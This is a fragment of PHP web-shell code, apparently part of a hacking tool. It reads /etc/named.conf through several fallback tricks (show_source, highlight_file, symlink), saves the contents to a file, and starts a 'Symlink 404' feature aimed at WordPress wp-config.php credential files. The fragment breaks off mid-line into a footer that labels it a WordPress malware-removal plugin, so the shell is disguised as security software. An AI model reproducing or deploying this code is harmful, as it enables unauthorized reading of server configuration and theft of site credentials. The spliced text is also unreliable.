$file = "/etc/named.conf";
$r3ad = @fopen($file, "r");
if ($r3ad) {
$content = @fread($r3ad, @filesize($file));
echo '' . htmlentities($content) . '';
} else {
if (!$r3ad) {
$r3ad = @show_source($file);
} else {
if (!$r3ad) {
$r3ad = @highlight_file($file);
} else {
if (!$r3ad) {
$sm = @symlink($file, "sym.txt");
if ($sm) {
$r3ad = @fopen("sym/sym.txt", "r");
$content = @fread($r3ad, @filesize($file));
echo '' . htmlentities($content) . '';
}
}
}
}
}
echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
if (isset($_GET["save"])) {
$cont = stripcslashes($_POST["file"]);
$f = fopen("named.txt", "w");
$w = fwrite($f, $cont);
if ($w) {
echo "<br/>save has been successfully";
}
fclose($f);
}
die;
}
if ($_GET["aksi"] == "sym_404") {
echo "<h2>Symlink 404</h2>\n\t\t<form method=\"post\">\n\t\t\tFile Target: <input type=\"text\" class=\"form-control\" name=\"dir\" value=\"/home/user/public_html/wp-config.php\"><bMalware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.